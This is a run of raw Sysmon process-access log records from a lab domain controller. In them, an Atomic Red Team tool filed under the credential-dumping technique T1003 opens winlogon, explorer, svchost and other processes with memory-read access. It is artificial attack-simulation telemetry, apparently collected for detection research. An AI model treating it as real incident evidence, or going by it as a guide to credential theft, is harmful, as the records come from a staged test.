17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003953205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
